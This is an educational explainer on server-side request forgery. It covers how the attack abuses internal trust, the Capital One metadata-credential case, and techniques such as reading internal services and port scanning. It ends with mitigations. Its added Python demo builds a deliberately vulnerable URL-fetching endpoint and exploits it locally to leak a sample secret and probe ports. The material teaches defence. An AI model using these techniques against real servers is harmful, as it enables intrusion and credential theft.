Server-Side Request Forgery (SSRF)


Server-side request forgery (SSRF) is a web application vulnerability in which an attacker induces the server-side application to make requests to a destination of the attacker's choosing, typically internal or external systems the attacker could not reach directly, and thereby gains unauthorized access to them.

  • threat actor abuses the trust established between the server and the resources it can reach, including itself
  • causes a server application to process an arbitrary request that targets another service
  • target service could be
    • another application running on the same host (for example one bound only to localhost)
    • or a service running on a remote host
  • exploits the implicit trust, and often the complete lack of authentication, between internal servers and services
  • relies on weak input validation
    • allows the attacker to control the destination of a server-side request
  • often targeted against cloud infrastructure
    • where the web server is only the public-facing component of a deeper processing chain
    • and where the instance metadata service will hand out credentials to anything running on the host
  • typically involves an attacker exploiting the web application's ability to send HTTP requests (or open any other URL scheme its HTTP client library supports) to other systems,
    • which are then abused to make "hidden" internal or external systems give the attacker access to protected features or leak information

Example

A well-documented example of SSRF occurred in the 2019 Capital One breach: a misconfigured web application firewall running on an EC2 instance could be made to request the instance metadata service, which returned temporary IAM credentials that were then used to read data from S3.
https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/

How it Works

  • web application comprises:
    • multiple layers of servers
    • with a client interface
    • middleware logic layers
    • and a database layer
  • a request initiated from the client interface (a web form) typically fans out into multiple requests and responses between the middleware and back-end servers
    • implemented as HTTP requests and responses between each tier, usually with no authentication because the tiers are assumed to be reachable only from each other
  • SSRF is a means of accessing these internal servers by causing the public server to execute requests against them
  • manipulated request is made with the server's privilege level and network position
  • works by manipulating the input of a vulnerable web application (a URL parameter, a webhook address, an image or PDF fetcher, an XML external entity) to cause it to send an HTTP request to a destination of the attacker's choice
    • attacker can use this ability to perform a range of malicious activities

Tip

PortSwigger (the maintainers of Burp Suite) have published an excellent technical overview of SSRF.
https://portswigger.net/web-security/ssrf

Common Techniques Used to Exploit SSRF Vulns

  • An attacker uses SSRF to access internal resources on a network that should be unreachable from the Internet, such as databases, admin interfaces, cloud metadata endpoints or local files (via file:// URLs, if the client library allows the scheme)
  • An attacker can use SSRF to access other web applications to steal data or launch attacks against other systems, with the requests appearing to come from the trusted server
  • An attacker can use SSRF to scan the internal network for open ports or other vulnerable services, using differences in response content, status or timing as an oracle
    • results are then used to launch further attacks
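The following is an added example, not code from the original page, that runs the two techniques above (reading an internal service, and port scanning through an error oracle) against the vulnerable "fetch any URL" pattern described under "How it Works". It runs entirely in-process: an internal service bound only to 127.0.0.1 stands in for a back-end admin or metadata endpoint, and public_fetch() is the vulnerable public endpoint. The service, its path, the secret value and the port handling are all constructed for the demo.

```python
"""Added example, not from the original page: an in-process SSRF demonstration.

Two pieces run locally so it works offline:
  * an "internal" HTTP service bound only to 127.0.0.1 on an ephemeral port, standing
    in for a back-end admin or cloud-metadata endpoint that the Internet cannot reach
  * public_fetch(), the vulnerable pattern: a public endpoint that fetches whatever
    URL the client supplies and returns the result
The service, its paths, the port handling and the secret value are constructed.
"""
import socket
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

INTERNAL_SECRET = "EXAMPLE-temporary-credential"   # constructed sample data

# Opener with proxies disabled so the demo always talks to loopback directly.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


class InternalHandler(BaseHTTPRequestHandler):
    """Stand-in for an internal-only service: no authentication, because it
    'trusts' anything that can reach it on the internal network."""

    def do_GET(self):
        if self.path == "/admin/secret":
            status, body = 200, INTERNAL_SECRET.encode()
        else:
            status, body = 404, b"not found"
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo output quiet


def start_internal_service():
    """Bind to loopback on an OS-chosen port; return (server, port)."""
    server = HTTPServer(("127.0.0.1", 0), InternalHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def public_fetch(user_url: str) -> str:
    """VULNERABLE: the public app fetches any URL the user supplies, from the
    server's own network position. It also echoes the failure mode back to the
    caller, which turns the endpoint into a port-scan oracle."""
    try:
        with OPENER.open(user_url, timeout=3) as resp:
            return f"{resp.status} {resp.read().decode(errors='replace')}"
    except urllib.error.HTTPError as e:
        return f"{e.code} {e.reason}"      # something answered: port is open
    except urllib.error.URLError as e:
        return f"error {e.reason}"         # e.g. connection refused: port closed


def probe(port: int) -> str:
    """Attacker-side logic: classify a loopback port from the oracle's answer."""
    answer = public_fetch(f"http://127.0.0.1:{port}/")
    return "closed" if answer.startswith("error") else "open"


def find_closed_port() -> int:
    """Ask the OS for a free port and release it, so it is (almost certainly) closed."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def exploit_demo() -> dict:
    """Run both techniques against the vulnerable endpoint and return the results."""
    server, port = start_internal_service()
    try:
        return {
            # 1. read internal data through the public endpoint
            "leaked": public_fetch(f"http://127.0.0.1:{port}/admin/secret"),
            # 2. use response differences to map which loopback ports are listening
            "open_port": probe(port),
            "closed_port": probe(find_closed_port()),
        }
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for name, value in exploit_demo().items():
        print(f"{name}: {value}")
```

Nothing in public_fetch() looks at where the URL points, so the server's own loopback interface, and by extension anything on the internal network or the cloud metadata address, is reachable with the server's privileges. The oracle in the port scan is simply that a refused connection and an HTTP error produce different responses; a real target often leaks the same distinction through timing or error messages even when the body is not returned.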

Mitigation

  • input validation
    • validate the destination, not just the string: parse the URL, allow only http and https, and reject URLs with embedded credentials or unexpected ports
    • check the address the host actually resolves to against loopback, private, link-local (169.254.169.254) and other non-public ranges, since hostnames, alternative IP spellings and attacker-controlled DNS records can all hide an internal address
  • allowlist (whitelist) hosts
    • web applications should only be allowed to reach trusted hosts and block all other requests by default; an allowlist is far more robust than a blocklist of known-bad addresses
    • re-validate every redirect hop, because an allowed host can redirect to an internal one
  • Firewall and network segmentation
    • network segmentation can prevent unauthorized access to internal systems
    • combine with egress firewall rules so the web tier can only reach the back ends it needs, and require authentication on internal services rather than trusting the network
  • Secure coding practices
    • use well-established and trusted HTTP client libraries, with redirects and non-HTTP URL schemes disabled unless they are actually needed
    • avoid user-controlled data in server-side requests; where possible accept an identifier that maps to a server-side list of allowed URLs
    • implement safe configuration settings, such as requiring IMDSv2 on AWS so the metadata service cannot be read with a single forged GET